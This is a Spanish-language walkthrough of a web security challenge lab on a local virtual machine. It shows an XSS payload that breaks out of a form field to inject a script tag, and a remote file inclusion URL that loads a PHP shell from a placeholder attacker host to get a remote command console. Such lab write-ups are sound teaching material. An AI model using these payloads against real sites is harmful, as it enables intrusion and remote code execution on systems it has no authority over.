Download Solución al cuarto Reto
Document related concepts
no text concepts found
Transcript
Solución al cuarto Reto Lo primero que debemos hacer es arrancar nuestra maquina virtual de rh7, la cual tiene una página de retos preparada. Una vez arrancada ponemos en el navegador la dirección IP de la maquina para acceder a los retos. Figura 1. Pagina de los retos Ahora vamos a resolver los retos. 1.- Reto 1 Esta es una página que nos pide un código para autentificarnos. Para solucionarlo no hace falta ninguna de las técnicas vistas en el articulo, simplemente tendremos que visualizar su código fuente. Julio Gómez Agustín Pérez María del Mar Castilla Solución al cuarto Reto Viendo el código fuente observaremos que el formulario llama a un código javascript y además podemos ver la dirección del mismo en el código con lo cual simplemente tenemos que entrar en la dirección del código y mediante ingeniería inversa averiguar el código que debemos introducir. Se deja como ejercicio obtener dicho código. 2.- Reto 2 2.1. Reto 2.1 Este es un reto de XSS, pero nos encontramos con un problema, y es que si introducimos un código este queda dentro de un cuadro de formulario y por tanto no se ejecuta. Figura 2.- Reto 2.1 La solución esta en visualizar el código de esta última página y encontrar la forma de que el código insertado quede fuera del cuadro de texto. En nuestro caso en particular es bastante sencillo, bastara con insertar un código de cierre del cuadro del texto, así podremos insertar, por ejemplo: texto"></form><script>alert(666);</script> Donde el script puede ser sustituido por cualquier otro código. Julio Gómez Agustín Pérez María del Mar Castilla Solución al cuarto Reto Figura 3. Solución al Reto 2.1 3.- Reto 3 Cuando entramos a este reto y pulsamos sobre una de las dos opciones podemos ver que el contenido de la barra de direcciones es: http://direccionIP/reto3/rfi.php?cont=hola.html Por lo que podemos ver que la variable cont corresponde a la dirección de una página Web, ¿Qué pasaría si modificamos esta Web?. Pues podemos probar con: http://direccionIP/reto3/rfi.php?cont=http://www.google.es Con este enlace se mostrara la Web de Google en lugar de nuestra Web local. Pero podemos llegar más lejos si en lugar de una página HTML insertamos una en php. Existe una gran cantidad de páginas preparadas para este fin. El proceso a seguir para esto es tan sencillo como subir el código a otro servidor, con extensión .txt, para luego llamarla con un enlace de la forma: http://direccionIP/reto3/rfi.php?cont=direccionAtacante/rootshell.txt Julio Gómez Agustín Pérez María del Mar Castilla Solución al cuarto Reto Como podemos ver en la siguiente imagen entramos en una página que nos proporciona una consola para ejecutar comandos en el host remoto. Figura 4. Ejecución del shell remoto. El resto de los retos los dejamos como ejercicio para el lector. Esperamos que os haya gustado la serie de artículos. Hasta pronto Julio Gómez Agustín Pérez María del Mar Castilla Solución al cuarto Reto Puedes ver una animación de la solución al reto con más detalle en la dirección http://www.adminso.es/todolinux Y recuerda el objetivo es aprender y si se da el caso saber como defenderse, pero nunca atacar para demostrar que sabes un poco más. Julio Gómez Agustín Pérez María del Mar Castilla